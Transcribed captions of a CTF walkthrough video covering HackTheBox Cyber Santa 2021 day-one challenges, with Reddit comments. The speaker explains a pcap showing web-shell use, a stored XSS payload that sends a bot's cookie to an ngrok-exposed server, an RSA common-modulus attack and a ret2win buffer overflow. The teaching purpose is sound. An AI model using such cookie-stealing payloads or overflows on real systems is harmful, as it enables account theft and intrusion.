Day 1 - HTB Cyber Santa CTF: HackTheBox Capture The Flag 2021 (beginner friendly)

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Thank you so much for this!

👍︎︎ 4 👤︎︎ u/jesse-13 📅︎︎ Dec 05 2021 🗫︎ replies

Day 1 challenges were easy but I still learned alot by watching your walkthrough

👍︎︎ 2 👤︎︎ u/ClassicJoule69 📅︎︎ Dec 05 2021 🗫︎ replies

Thanks for posting this. I started with the toy shop one and never got it so I gave up after that. I’m glad to see how it was solved because that was bothering me.

👍︎︎ 2 👤︎︎ u/space_wiener 📅︎︎ Dec 05 2021 🗫︎ replies

I can’t believe I didn’t see that you could click on the elves heads till I saw this. I was so confused with this challenge!

👍︎︎ 2 👤︎︎ u/throwawayprivateguy 📅︎︎ Dec 05 2021 🗫︎ replies

its not tooo beginner friendly. you got to have some decent+ experience to solve em all.

👍︎︎ 2 👤︎︎ u/sasebot 📅︎︎ Dec 06 2021 🗫︎ replies

i don't want to spam the hackthebox reddit with links every day (👀😅) so here's the day 2 vid: https://www.youtube.com/watch?v=deg0CQwwN-M + plz subscribe for more releases coming this week ❤

👍︎︎ 2 👤︎︎ u/_CryptoCat23 📅︎︎ Dec 06 2021 🗫︎ replies

Captions

in this video we're going to take a look at some of the challenges from the hack the box cyber santa capture the flag competition it's running for five days and we've got five challenges each day so i'm just gonna go through the day one challenges now but let's just go and have a quick look at what the competition's about you see here global competition five days prize pool just over eight thousand pounds solo ctf jeopardy style so just basically challenges no kind of boxes to hack and it's designed to be beginner friendly and it just tells us here basically it's gonna be five challenges released each day you can see we've got five web five-pound five crypto five forensics and five reversan and on the 14th of december i believe there's going to be a live stream yeah 14th with walkthroughs and qa on youtube so that'll be worth checking out some great creators here uh but yeah without the way let's go over and take a look at the challenges i'm going to go over these in the order of the number of solves at the moment so the one with the most solves is the forensics challenge baby apt let's take a look at it the description says this is the most wonderful time of the year but not for santa's instant response team since santa went digital everyone can write a letter to him using his brand new website apparently an apt group hacked their way into santa's servers and destroyed his present list could you investigate what happened so we've got a pcap file to download for this one i've already got it downloaded let's have a look at it here see here peak up we can open this up with wireshark or you could do it with t-sharp or something if you wanted but it's a bit easier to see what's going on in wireshark first thing i normally do is go to statistics and we can have a look at the file properties and the protocol hierarchy conversations can be quite good here as well just depending how hard it is to find the flag in this case first thing i'll do is go to the protocol hierarchy just see what sort of data we're dealing with and we've got http which is likely to be of interest to us unless there's some kind of dns exfiltration or something like that so i'm just gonna select this as a filter you can also just type http at the top to do this and we can see some http requests we're going to follow this as a http stream and we can see that there's been a post request this register we don't i don't see anything in here that would represent a flag let's go back and do the same again i'm just going to filter that by http we also have this post request to bg.php so let's take a look at that one let me take a look at this one we can see there's actually a command sent so there's a php file looks like some kind of shell and you can send a post request to this php file with a command specified in the pro as the parameter post prompter in this case they've tried to cut out the etc password file and they've actually got it back as well um i still don't see anything there which could represent the flag i'm going to close that again we had a few of those post requests so presumably we've got a different uh we've got some different requests that are being sent off some different commands that he sees to that php shell and right enough if we get to our last command here we can see that this is encoded at the moment so we've got some url encoding which makes it a little bit harder to read let's go to cyber chef can throw that in here and say we want to url decode it makes it a little bit clearer and we can see that it's removing an sqlite file and it was also calling echo with what looks like a base64 encoded string so i'm going to copy that and replace this here and get rid of our url decode we'll go to base64 decode and now we get our flag we could probably have also any time if you don't know what that encoding is well you can go and try some different base encoding methods depending on what their character range is here and also even from base64 you can change the alphabet here so sometimes uh maybe a different alphabet's been used to encode it but what i was going to say there is if you really don't know the encoding and you're out of ideas you can try to throw this magic cyber chef and it'll try to do some different decoding methods you can see that it identified that this was base64 and brought back our flag as well next up is the web challenge which is called toy workshop and the description says the work is going well on santa's toy shop we lost contact with the manager in charge we suspect that evil elves have taken over the workshop can you talk to the worker elves and find out so for this one we've actually got a docker container to launch which i've started as well and we have we can download the source code as well to take a look at it this does actually come with a build docker script which we can use to get this work in locally so sometimes if you're working on ctf the server can be quite slow or you might be sharing instances with other people or you might want to modify some of the source code to try and help debug the challenge if you're not able to solve it that's the times when this is particularly useful i'm going to try and launch this but it might take a while to boot up so let's see if it's done by the time i take a look at the code so i'm going to open up the code with codium another thing to mention with the docker is sometimes if you're doing challenges where you want it to make a callback you have to remember it's inside a docker so it's not necessarily you can't just if you were trying to make a callback from a http service for example it's not going to call back to your vm to your local host that you would expect it to it's going to be restrained to that docker so you would need to get into the docker shell in order to see any of those callbacks if that makes sense maybe it doesn't but basically in some cases i think it's easier just to if you know how to solve the challenge it's easier just to go straight to the site than it is to get things working in a docker particularly when it comes to web challenges but maybe that's just me i've opened up the site here anyway let's go and take a look at the code sometimes there's interesting things in the configurations which can give us a clue as well i've seen before cases where there was like a log poison challenge and you could tell because of the way the login had been set up in the configuration that that was going to be important um so let's try and let's start off here we've got our just open up the pages we've got here so we've got some of our views here this isn't going to be too important to us it's the javascript that we're going to be interested in so in our roots here we can see that we've got we can make a post request to api submit uh we can make a get request obviously that's going to render the page we can make a post request and supply a query as the body and it's going to call this bot reads queries db you see here db add query it's going to try and add it and it's sending that over to them if we don't send anything it's telling us basically please fill that in alright so that's one of the options another option is we can get queries but if we do that it's going to check first to make sure we're calling from the local host so if we're running this on the remote server our ip address isn't going to be 127.0.0.1 unless we can find some way to forge that so sometimes that can be through using headers and things like that or by in some cases forcing the user who is the local host to perform some action for us uh so queries is basically going to call result render queries it's going to grab the queries from the database um so let's go and take a look where is this database we've got our database.js all right so when this is set up we have id query created out okay add query is going to insert whatever values are provided and then get queries gonna select all okay that's fine let's go let me just go back to the this is our main index.js let me go back to see what this bot was about because we have this bot.js so we had bot.read queries whenever we whenever the post api submit is called and if you're going to have a look at the bot this is basically a browser which is being set up using puppeteer and whenever this is launched whenever the bots created it's gonna create a cookie with our flag in it this is obviously a fake flag for the local testing but if we're doing it remotely this will have the actual flag in it so bots created it has the flag it's going to visit the local host we've got set cookie and then it's going to go to queries so let's just run over that again we've got our index.js here we send this post request it's going to add the query to the database which we have here we can see add query it's going to insert our query here and then it's going to where does it go and then it's going to call read queries so it's adding the query and then it's reading the query and if we go to the read query this is actually going to uh well we know that where it was the that's too many files for me to keep track of it's going to select all from queries and then it's going to resolve that so it's actually going to load whatever we insert there so if we were to insert some html or some javascript or something like that it's going to it's going to insert it into the database and then it's going to try and load that as a page so let's try and steal the the flag as a from the cookies let's go over to our workshop we've got we can basically click on one of these elves to get this message up and we can send something let me just send that test as an example it's enough it's delivered successfully we can go and have a look at burp suite and see the post requests we can see yep this was sent off we could send that to a repeater and start playing around with it what i'm going to do is just go ahead here and insert a script so let's do scripts let's close that off as well and [Music] in here what we can do is well there's a lot of different things we could do we could have it like load as an image from our server and have like an on error alert or something like that whenever it doesn't find the image and it'll send us a cookie what i normally do is just set this to document.location equals and then we're going to give it a location to visit and the location we wanted to visit is going to be our server so i've got an alias here web up which i'll show you what the alias is it's uh grep web up from flash aliases so this is just to create a http server on port 80 in case you ever see me running that and wonder why it doesn't work for you on your local system uh so that's going to get that running and now what we want to do is expose this to the internet as well so we can use something like we could use request bin you can see i have request bin here which you can go and log into and basically it'll give you a a proper server on the not just a local ip address for it to connect to basically but what i normally use is ngrok uh just type ngrok here to get some examples up you can see here we can set ngrok and provide a protocol provide a port under some other options we can provide here as well and this will expose local network services behind nuts and firewalls to the public internet over a secure tunnel which is exactly what we want to do we want them to have access to this be careful because obviously anybody that then that has this ngrok address will also have access to whatever you have on your web server in this case i'm inside this web toy workshop it doesn't really matter too much but if you were on your desktop and you've got some other things in there that you don't want people to have access to something worth bearing in mind so i'm going to do engrock http 80 because that's what service i want to expose it's going to give me a address to provide here and i'll just show them as an example if i go to this address now in a browser in firefox it's now giving me access to this local directory you can see in here we saw the request that was made and here in the http server they've got run you can also see that so let's go and provide this then as the url so it's saying to execute this javascript which is going to change the document location it's going to change the address to our server we don't just want you to access our server we also want to get a flag a cookie so here we can say then we'll close this off and we'll say plus document dot cookie and hopefully this will be it let me take a copy of it in case there's any problems we send that off and hopefully this is going to store it in the database it's then going to query the database and load whatever's in there and execute it and whenever it executes it it's going to go to our location and it's going to send its cookie as part of the query so if we go and take a look at our local http server it took a little while to come through but you can see here we've got our flag which is hack the box evil elves are rising up the next challenge is called common mistake it's a crypto challenge and the description says elves are trying very hard to communicate in perfect secrecy in order to keep santa's warehouse unfortunately the lack of knowledge about cryptography leads him to some common mistakes and we've got one file to download in this case it's called encrypted.txt and you can see in here we've got some it's actually in json format let me move that to enc.json oops move encrypted to ink.json let's open it up in codium hopefully we get a bit better formatting oh that's not what i wanted to see let me let me move that to anc dot python dot py obviously try and close that down all right a slightly better we've got a bit better format here anyway basically we've got a couple of different objects we've got two objects each of them have an n and each of them have an e and each of them have a ct so we've got a modulus we've got the encryption value and we have our ciphertext for each of them um despite my handle being crypto card i'm not really a big fan of crypto so i'm gonna skip through a lot of the details here but if you want to learn about this attack type there's an article here on common modulus which is basically the issue that we have here so if you're going to take a look at this here and see in a scenario basically where eve has two different ciphertexts of the same message m they've been encrypted with a different exponent but common modulus so in our example here the flag has been encrypted with with the same modulus but two different encryption values uh two different exponents so um you can go and have a look into the maths here something i'm not going to cover at all here but we've also got a script which you can use in fact this might be the script that i used yeah what's okay um so [Music] uh this this was a script that i use which you can provide a the modulus we can provide the two exponents and we can provide the cipher text oh no sorry this is the one so it takes type long so actually if we try to use this it won't work we get an error something to do with i think recursion or the long being too long or something uh so this didn't work for me so let me just run through the solution that did work there's something called the rsa ctf tool which didn't actually i wasn't able to solve the challenge with this but it did i did use it at the at the beginning to generate some of the parts that we need so this tool can be used for a variety of different attacks you can set it you can specify the attack that you want to use or you can let it run through all of them the problem i normally have with this is that that never seems to be the right options for the values that have so in this example we do have a common modulus i believe let me search here common common factor between ciphertext and modulus attack common factors across multiple keys but whenever you go to specify them it doesn't seem to be an option to provide the multiple modulus and the multiple cipher text you know we have on cipher file or on cipher but we don't have an option to provide two different ones as far as i can see maybe somebody if you can let me know in the comments if you use this tool to solve the challenge completely and that would be good but what i use this for was to create a public key so we want to create two public keys here this isn't necessarily required depending on how you solve the challenge you know different scripts will take in different formats the reason i did this was because the script that i did find to solve this takes in the cipher text and it takes in your public keys and we don't have public keys at the moment we've got the values to create the public keys it also takes in the messages as base 64 as well so that's worth bearing in mind and hopefully then this will get us a flag let's download this python file in fact let's go and let's go and do what we need to do with the rsa ctf tool first of all so we'll get clone to get the full features out of this you need to have a lot of stuff installed like sage math which i'm not going to install because it takes ages um but let me i'll just do a bit install requirements for whatever python modules it needs there it probably doesn't need these to be honest to create the key or probably doesn't need all of them but once we've done that we can create our key let's do let me just show first of all if we just run python rsa tool and see it gives us all the different options and things that we need here or that we might need and we want to do the public key which is going to be python rsa tool we can do create pub and then we want to specify our n i'm not sure if we can provide this in hex or we might need to e format or or in hacks okay it looks like we can do in hex so the n is going to be the same for both it's just the e that's going to be different where's the okay this one we've created our first public key so i'm gonna do sublime keyone dot pub i just accidentally copied a blank space and pasted it all right there we go and then we want to do the same thing we want to i'll just type it out again it's gonna take too long deleting that python rsa tool dash dash public create pub dash n oh it's not gonna take long because the end is the same what am i talking about all right so we'll just go back and grab that command and it's 0x23 for this one we create our public key and that's a key key2.pub save that okay so now we want to grab the other script as well i'm just going to go and take a copy of that here w gets and we need to make sure our ciphertext is basic c4 encoded as well so at the moment it's in hex format i'm going to take this we'll say from hex so making it raw but now we want to say 2 base 64. and that's our first ciphertext i'm going to save that as c1 save that oh sorry i'm going to change that to c1 b64 probably doesn't really matter but i noticed that was the format that they were using in the script and we need to do the same for our second ciphertext so we'll do c2.b64 paste that in and now we should be able to run this new script let me get rid of cyber chef in the background so we'll do python and it's called rsa cm common modulus and we can pass in let me see does it give us the options there yeah so we can pass in our c1 ciphertext which is going to be c1.base64 passing our c2 ciphertext c2 b64 our public key one so key one sorry k1 is key one and k2 is key two let's try and run it and we get back our flag so there's probably quite a few different scripts out there to do this which take your data in in different formats and stuff like that i also noticed with some scripts that you get some errors around recursion the depth or around the length of the numbers and stuff like that but if anybody solved this with rsa ctf tool alone i'd be interested to hear how you did it the next challenge is called mr snowy it's a pone challenge on the description says there's snow everywhere kids are playing around everything looks amazing but this snowman scares me he's always staring at santa's house something must be wrong with him so we've got a file to download a binary so we can get this working locally and then we'll be able to connect to the server afterwards let's go and take a look at it we've got a flag here as well a fake flag for testing just have a look at that we see here we've got a 64-bit lsb executable which is not stripped which means we'll be able to see all the original function names and stuff like that it's still got symbols in it we can run something like checksec to determine what protections are enabled on the binary so we can see some of that here it would mention if it had pi and we can see the stripped and stuff like that but we can also see here there are no canaries found so if there was a canary found and we were overflowing the buffer we would need to make sure that canary doesn't get overwritten with a a new value so if if this did have a canary and we were doing a buffer overflow we'd basically need to leak the canary and overwrite it with the correct canary nothing to worry about because there's no canaries found we've got full railroad here so this just means we're not going to be overwriting elements of the global offset table again not too relevant here and nx is enabled this is a little bit more relevant so um if we overflow the buffer we're not going to be able to inject any shell code onto the stack and expect it to execute it'll be marked as data only um but that's again not too important for this challenge and finally pi as we as i mentioned we would have seen that here whenever we check the file type pi just basically means that the program will load at different memory addresses each time but in this case there is no pi which means it's a fixed address the addresses will be the same on the server and on our local host and we can basically just provide the addresses we don't need to worry about leaking offsets and things like that sorry if that was a bit too much for anybody who's not done any of these phone challenges before none of that's really too important for us but i just thought i'd cover some of these protections before we get going so let's make the file executable uh where is it mr snowy we'll make it executable let's try and run it and just see what happens uh we have some animated input while this looks really cool in the terminal it's extremely annoying when you're trying to test the binary because obviously we have to wait for the menus to load up each time we can say let it be here and it'll just exit the application which means whenever we run it again we need to wait for all that animation again the other problem is because it sends the delete it sends these characters with a slight delay between each one if you're running a script and you're trying to debug it like pwn tools for example it will it will print out a lot of output for each character that it sends which can make things look a bit messy obviously we want to investigate because let it be just took us out of the menu and then we can deactivate or we can break it let's try and deactivate it says you do not know the password mission failed all right so obviously we need to break it if we want to get any further with that menu so we're just doing a little bit of black box testing here without looking at the code or trying to disassemble or reverse engineer it just playing around to see what these options might do so what did we try that we tried to break it did we then we tried to deactivate let's try to break it it says this metal seems unbreakable the elves seem to put a spell on it so both of our options there said mission failed so let's go and take a look at the code in gear draw so we open up gear we've got our decompiler on the right we've got our assembly code here we've got you can access the sections of the binary here and we've got all of our functions our imports and our exports and stuff here we want to jump straight into our main function typically and go and have a look here we've got set up most of this stuff is just for the visual stuff that they have set up there we've got this banner which is going to print out this snowman and you can see why when it's running through all this stuff that makes debugging a little bit hard because you have to kind of watch all this happen in the debugger um but we go back our main functionality is here in the snowman function and we can see what's this print string it's going to print out the string which is in the data section of the binary you can see here on the disassembler what it's printing out and then we have a buffer up here which is defined of 64 bytes it's going to read in so it's actually going to read in only two bytes here it's reading two bytes into our buffer of 48 bytes so there's no buffer overflow there right two bytes fits inside 64 bytes so there's no issues and then we have this atoy this is like converting a char to a number so we're providing in a menu number it's converting it to a integer and then it's checking to see what the integer equals and we'll either investigate or exit because remember that first time we hit two and it just exited so that's what's happening there let's go and have a look at the investigate function so for the investigate we've got another buffer which is defined here 64 bytes of characters we have a it's printing out another message so that's just printing out our menu option basically to us and then it's going to read in but look what it's reading this time it's reading in 108 and that's in hex as well so we can actually go over here and highlight that in the disassembler and see that equals 264 in decimal so that means it's reading in 264 characters into this local 48 variable which is 64 characters so there's a clear buffer overflow there right we can overflow if we overflow these values will be able to overwrite the return address so that whenever it returns from this function it returns to an address of our choice and that address might be to some shell code or some drop gadgets or something that we have aligned set up but obviously in this case there is no shell code to execute so we need to have a look around and see if there's any other functions of interest in here that we might want to jump to um apart from that we have what we saw there so we know that whenever whatever we provide it exits we provide one and it's gonna exit we provide two it's gonna exit so there was no way to get any further through this menu we had to exploit this buffer overflow and if we're gonna take a look at some of the other functions here i guess we need to try and find out something of interest we've already looked to investigate the printing is not going to be interesting snowman we can go and flick through these but we see that we have this one deactivate camera and if we right click this and say show references to there's it's not actually being called there's no unconditional calls to this function and if you're going to take a look at it you can see that basically what it's going to do is going to open a flag.txt if it's not there it's going to print out an error and if it is there it's going to print out the flag so right there we've got an address we can go in we can go and grab this address here 401165 and provide that as the address to overflow the buffer or we can go and put together a pwn tool script and that means we'll just be able to act access the actual function names as well or we could still use the address however you prefer so let's go and verify how many bytes you need to overwrite if we go back to our snowman function uh we will investigate and investigate we can we can kind of work this out from the stack but it's um it's also possible to do this in gdb using the cyclic function from phone tools so i'm going to open up gdb phone debug and pass in mr snowy and what i'm going to do is generate a just to mention here we can also access all of our functions and stuff in here we can go and disassemble uh deactivate camera for example and see that we can get the addresses and stuff here that we might need to do our buffer overflow we can also access a lot of useful functions in phone debug if you just type help and then pick something to get more help on so you can do like help obscure and it'll give you more things that you can then run help on you can also just do a tab here and just get a list of other functions that you can call so there's a lot of stuff you can do in here and a lot of functions you can access from outside for example we can get into right there from here as well just do r2 aaa to analyze afl to list the functions and then we could go and select one of those and disassemble it with pdf so if you like using red air that's an option in here but oops close the whole thing down uh but yeah i'm just kind of just showing a few things you can do there in case you can also do pwn debug as it says here pawn debug filter for a list and this will tell us a lot of other things that we can do here as well but what we want to do in this case is run cyclic and you can see here this generates a very big cyclic pattern we don't want them one that's one that's that big so i'm going to say cyclic 500 even though that's kind of well over what we need as well we know it's going to be like 60 or 70 bytes based on the size of the buffer uh so we generate cyclic pattern of 500 we'll run the program we still have to wait for it to do its animations and we want to investigate it asks us then do we want to deactivate we want to break it we don't want to do either we want to pass in this cyclic pattern and see where the crash happens so we provide that and we can see then it's crashed we have at our instruction pointer here the address that it would try to access is s-a-a-a-t-a-a-a the reason it's not in the rip it's on the rsp is because in 64 bit it won't try to access memory addresses that are illegal basically that this can't be a valid memory address it's not in the correct range so it won't even put it into the rip if you were doing a 32-bit challenge you would see it go in here you'd see only four characters because obviously half the address size and it'd be in the eip now that we know it's s-a-a-a-a-t-a-a we can just grab some of this and say cyclic l to look that up and it'll tell us that the offset is at 72. so if we write 72 bytes and then the address of this deactivate camera function it should overwrite the return address and send us to that function so to do that i'm going to put together a pwn tool script and i'm going to copy over a template which i always use for all these scripts um so we'll just create this and call it exploit.py and let's open this up and make the changes we need to so for anybody who's not seen my phone videos before uh go back and check them out because i'm going to cover this in a lot less detail than i have in the past because probably got some repeat viewers who who are fed up with hearing it but this template allows you to easily swap between debugging the gdb swapping between connecting to the remote server which you're going to need to do soon and testing locally because we have this gdb option here we can also set up a script here to set up break points at different locations we could say we want to break it main or something like that and we won't then once that's up and running we don't have to basically go and make any changes to the code to swap between these three options i also added this find instruction pointer function in here which is basically just going to do what we just did in gdb you can see here we're doing a cyclic pattern and we're calling this function so let me just show how this works first of all i'm going to change this to mr snowy um also here we have the context binary being set so this is basically going to identify whether this is 64-bit whether it's windows or linux etc so that later on it'll it'll know what the context is and if we don't provide a context it'll default to the one that the binary is now we've also got debugging here this is going to look horrible so i'll show you what happens because of the animations um and apart from that let's just comment out let's get rid of some of this stuff that's not needed take that out and i'm going to comment this out so all we're doing to begin with is just trying to identify how many bytes we need to write to overwrite the return address so it's going to launch the program here and after the send it's going to send line after the the the angular bracket which is what we do see whenever it sends the uh let me go back to i should just run the program but you see here the last thing it will send is this angular bracket so after that we want to send the payload but actually we don't want to send the payload because we want to first make sure we get into the right menu so remember that first asks us do we want to break it or do we want to do something else we want to say after the angular bracket the first time we want to send a one i believe it was one the b will the two will exit we're going to send that it's going to wait for another angular bracket and then it's going to send the payload which is going to be our cyclic pattern of 500 bytes and then it's going to wait for the program to crash and then it's going to read the core file which is dumped and it's going to grab that stack pointer to find the offset if you're dealing with 32-bit you just need to uncomment this line and then comment the 64-bit one so if we run this now python exploit dot py you see we get this horrible output because i have it on debug mode and it's sending each character with a slight delay so we wait for all that's complete but then we see that it does the cyclic pattern and it reads the core dump and it finds that the offset was at 72. so this is just this s-a-a-a-a value that we saw in gdb as well so everything i did in gdb there in terms of identifying the offset and the same in here of kind of looking at the size of the stack you can see the variables here isn't really needed you can just use the you can use the function important tools to do that for you and now that we've done that let's go and finish off the payload so we're going to start the program and we're saying here we want to build up a payload at this offset which is going to be 72 we want to send the return address so we could go and grab that address that i mentioned here so we could go and put in here 0x4 uh where did it start there let me go and grab this so yeah one way you could do this would be to provide this and you don't need to worry about the fact that it's 64-bit and we should actually be doing all these zeros because we've told the program what the architecture is here so it'll default to 64-bit um flat is basically going to flatten lists and tuples and strings and numbers and things into the using the pack function so basically using the context we have set there there's a lot of different ways you can do this syntax wise don't worry about it too much but basically we create that payload and then we're gonna do the same thing again we're gonna say we want to press one on the first menu and on the second menu we want to send our payload i'm also going to go and turn that debug mode off so we can actually see what's going on and we run this we have to wait obviously for it to go through the find instruction pointer function we just don't have all the output now but that's exactly what it's doing it found the 72 bytes and now it's launching the program again this time it knows where the instruction point is going to be so it sends that off and we get back our fake flag for testing now the awesome thing is because we have this script set up to swap between local and remote we can literally just say remote paste in the server address and the port number and send this off and it should come back with our flag i've been getting this warning a lot so i see that phone tools have updated you see here they've actually given a link to the bytes section it's kind of annoying because i just want to kind of disable this message to be honest but um i think where what do we need to change we need to we need to change something else here to i think like encode the payload or something i don't know so we've got back our flag here nice try elves but not good enough one other thing i forgot to mention there was that we can we don't have to provide the address here so because we're loading the binary we can also say elf dot functions or elf dot symbols and then we can also provide this as like this kind of syntax as well so for us we wanted to deactivate camera so i'm going to deactivate the activates camera and that should do the same thing for us in fact let me also just go here and say pretty print dot symbols so just show everything that's there as well might as well look at something while it's spending two minutes connecting to or doing the animations okay we're still going to wait for the offset should have just gone and changed that to 72. okay so you can see it's printed out all of our symbols here um so we can whenever we say that we want to access one of these functions rainbow for example it's given us the address here as an integer so it's mapping those okay and you can see we also got back our flag in this one as well the final challenge is called infiltration it's a reversing challenge and the description says we got hold of an internal communication tool being used by the elves and managed to hook it up to their server however it won't let us see their secrets can you take a look inside so we've got a docker container for this and a downloadable part i actually spent a long time on this challenge not realizing there was a docker container until i saw it mentioned in the discord and then went and checked uh so it caused a great deal of confusion i really couldn't understand where the flag would be coming from in the code that we have but let's go and take a look at it i'm not going to jump straight into the solution i'm kind of going to go through some of the stuff that i was going through before i realized the docker container was there and stuff like that let's see what we've got we've got this client uh let's might be executable already but let's go ahead and make it executable and try and run a client tells us we need a server and a port let's do localhost 13337 connection refuse so let's make sure we're listening on one three three seven listen on one three seven we run that again and now we don't get any errors we go back to our netcat and you can see we've got a connection from our local host on four zero nine one six let's try and send something say hello it came out two at symbols and it reversed the hello that we sent nothing happened on the server uh sorry not on the server well obviously this is our this is a it's called client so client we're providing a server address and port number to connect to and we enter in something else okay let's just come back with the full string now and it exited the application we could try it again we could try and enter in some different values and see what we get but again we just see that's being reversed and yeah nothing else happens then we might also want to try and do something like l trace which we can use to see what's going on the background oh we need to make sure we have our server running and let's try and put in now hello and okay so we can see it's doing the send and receive and it's not really showing us anything else there all right so let's go and take a look at the code we could have a look at this in gdb or adair or something i'm going to go over to geardrive because we get our decompiled code as well which is a bit easier to read okay so we'll jump straight into our functions here we this binary is stripped so whenever we look at the phone challenge there let's check the file type again you see this one actually is has got pi enabled and it's stripped so instead of seeing the main function there and the names of all the functions it's just been given the offsets as the names pi being enabled as well so let's just do check search just of interest so all the protections are enabled there we don't have full railroad but we have canary found we have nx enabled and pi enabled so a sea of reds obviously this isn't a binary exploitation challenge so we would expect those protections to all be there but just wanted to compare that with the last challenge that we went through as we go over to our entry function we can just click the function here that's going to be opened up you can see just an idea of what's happening it's asking for the server and the port number if we don't provide something we're going to get some errors socket error or we're going to get this error here if we provide everything our server report and it's able to connect it's going to call this function as well we could go through and start renaming these functions you can use l to rename it or we can start inserting comments around once we kind of work out what they're doing but there's not too much happening here we have this ivar one it's calling function and the value that's being returned if it comes back and it's not 0 it's going to return if it is 0 it's going to go down to this next function here which is going to do some other stuff here we can see untrusted client location enabling opaque mode we can see we have our canaries here as well so remember on the last challenge it was talking about the canarys basically this is set up this local 10 is set up at the beginning of the function and it's set to a random value basically and then whenever it gets to the end of the program it's going to check to see whether this still equals you can see here it's checking does it still equal what we assigned it to at the beginning if it doesn't then it means somebody has over written the value on the stack and then it's just going to exit the program so if we if there was a buffer overflow here and this was taken in 1032 bytes but if it was reading in say 2000 we would need to overwrite the we need to find out what this canary is and then we need to overwrite the value on the stack with the correct canary to make sure our buffer overflow succeeds a bit of a detour there um but just uh in case anybody's new to binary exploitation it might be of interest uh we can flick through the functions here's actually quite a lot of functions so some of them aren't going to be necessary for us let me go back to the entry let's go back in here and this is the function that we're going to be interested in because this is what it's going to first and there's a lot of stuff happening here but um i find it easier to kind of work out what's going on by running this with a script i actually put together a little phone tool script to send some input and then return it and we can set up breakpoints and stuff there but essentially this is reversing our input as we saw whenever we typed hello it comes back with a reversed input so it's gonna do that we've got our param1 here it's going to receive in another value and then it's going to perform some xor as you can see it's making sure the length of it is 32 same here so it's reading in 32 bytes gets another 32 bytes and starts doing some xor operations and then it's going to send the value back that's been xored and there's some negation here with this uint conversion so i didn't realize there was a server to begin with so i was trying to work out whenever we send this stuff off where is the flag actually coming from because it takes an input from us and then it takes another input and then it does some xor operations but it's not it's so it's always our inputs not we would have to completely guess the flag or know the flag um so obviously i was approaching it wrong we we do have a service connect to and the server has the stuff we need but let me just actually show the pontool script that i put together because it's a little bit different structure in these scripts whenever you have a client and you have a server so you see in this case we have to do our nc nlp set up a listener on port 1337 so if we're using pro tools we also need to do this as well as launching the client so let me just create a exploit.py i'm going to copy this over and this is just the same template that i use in the previous example you can see i've got some break points set up here so it was breaking at some different locations in the program to try and see what was going on at the time the reason i don't just have break and then the full address is because that pie is enabled so whenever we look at these addresses here they're actually just offsets and we won't know what their actual full address is until we run the program so this is basically just set to run the program and as soon as the program starts running it's going to set up these break points for us break rva is going to break at this offset from the pi base you can get the pi base just by typing pi base and gdp power debug and it'll it'll show it and then we're setting up a listener here on port one three three seven we're gonna start our program and pass in the local host on one three three seven and then we're gonna set this client to wait for the connection so the the issue obviously for for me here was that i was trying to do this all locally not not realizing we did we had this remote server but essentially i sent off some value we know there's 32 bytes we need to send off and then if that's done properly it'll ask for another 32 bytes and i was just sending this off to try and work out what was actually happening in the background let's run python exploit we send it off and we see okay so we sent this off it's reversed our first input we send off another input and it does some xor operations and we get a value back if we were to do this with the gdb pawn debug so all i need to do now because i've got those breakpoint setup is just type gdb at the end it opens up gdp in another window it's set up our breakpoints and it's currently hit a breakpoint and now we can go and actually have a look at what was what the instructions are i can't remember exactly what break point i set up here um let's hit continue you see here so you can kind of go through instead of break points of whatever you think might be interested interesting in this case we have a compare i think this might be around um too many windows open i think this might be around the main function entry um so this part here i believe one seven four eight let's have a look one seven four eight um no okay somewhere else but yeah i can't remember exactly what these break points were ourselves but just to show how we can do this we can also then as we get to places you know if for example we return from that from this function and this doesn't equal sorry if this does equal zero no if it doesn't equal zero it's going to return so if we return from that function and that did equal zero all we need to do is go and set up a breakpoint here where it's going to do that test or it's going to do a compare and then just go and modify that in gdb so for example if this rax is set to zero and we need it to be set to a one we could just do here set rax equal zero x1 you can see here then that the rax has been updated and then we would just hit continue or hit next and let it keep going through what it needs to do um so that's a little demonstration of how this phone tool script will work with gdb this didn't help anyway didn't help me get the flag because obviously we need to go and do this against the remote server and if we go and do it against the remote server the output's a little bit different let's go and test it out okay i'm going to close this let's go and get the server address and port number we'll do netcats and it comes back with this output and we can try to enter something in it just comes back with the same issue we could actually try and do even if we do 32 bytes let me go and grab this this is 32 here you can see down here 32 selected because that's what they needed to be but if i go and enter this in now as the second input it doesn't actually take it and the reason being whenever this is done it shows up as like a the length has been 1 instead of the length being 32 i noticed that whenever i was debugging it but if you do this inside of pawn tools it won't do that so if we launch a script and connect to this server address and port number and then send these to off it will come back with two different values it does that xor thing uh but it's not though it's not the way we want to approach this anyway let's we know that the server is going to be loading the flag which we don't have on our client so let's uh let's go and set up a break point around this function which is one seven five three and we can let's run the program we're gonna run the program with this server address and port number actually i'm going to do gdb phone debug pass in the client and okay now we need to run it with that server and port number let me just get that so we're going to run we're going to give it a server address and port number uh we've just got there untrusted client location so this didn't happen whenever we ran this locally right we didn't get this message so we can see that it's actually got through to this section of code in here and this is what's going to be of interest to us so if we can set a breakpoint up around here remember this was let me go back and get that function address uh one seven five three so we can say here break rva zero x one seven five three it's not gonna let us because the program's currently not being run so can we break and we can't break it mean either let's do break uh maybe it's star i okay that starts at the first instruction and then we can do our break rva we'll hit continue we hit our break point and that's the start of this function which is about to be called and then i basically just stepped through here so we can step through next next and we can keep going and have a look to see what's in these registers and stuff maybe you want to print some of them out and see what's in there but what i'm interested in is this receive it's going to call receive again and we know the send in the receive is sending and receiving stuff from the client to the server so let's go down to receive and okay you can see what's been set up here this is a socket that's being set up a buffer we want to see what's actually retrieved so next one more time and we get back our flag not quite so opaque so the flag has been retrieved to the stack and by setting up a break point there in the application where we were able to retrieve it we could now go and say x x over s r s p we can print out the flag and just take a copy of it and go and submit that another way we could have actually done that is to run the same thing say netcat we'll do s trace pass in the binary server and port number and we run that and s trace will also retrieve the flag for us this is kind of like running the l trace as well but l trace doesn't come back with all the information there that we would uh need so yeah we can do that with a debugger or we can do it with s trace uh quite an easy challenge i guess considering how long it took me to solve it i mostly blame the docker not knowing about the docker for that but i guess it's not the only thing to blame um but anyway we've got all five challenges done day one complete uh let's just go over again so in terms of the solves at the moment we've got one and a half thousand for baby apt forensics which was obviously the easiest challenge second place was web with 621 at the moment and then crypto with 427 and then phone with 325 and reverse him with 340. okay reverse has actually gone up now that's good um yeah but that'll wrap it up this video and hopefully we'll get some more challenges done over the next few days i'm not sure if i'll be able to get every day done but let's see if you have any questions or comments so you solved any challenges differently using cool tricks you want to let me know about and just leave a comment below thanks

Info

Channel: CryptoCat

Views: 4,476

Rating: undefined out of 5

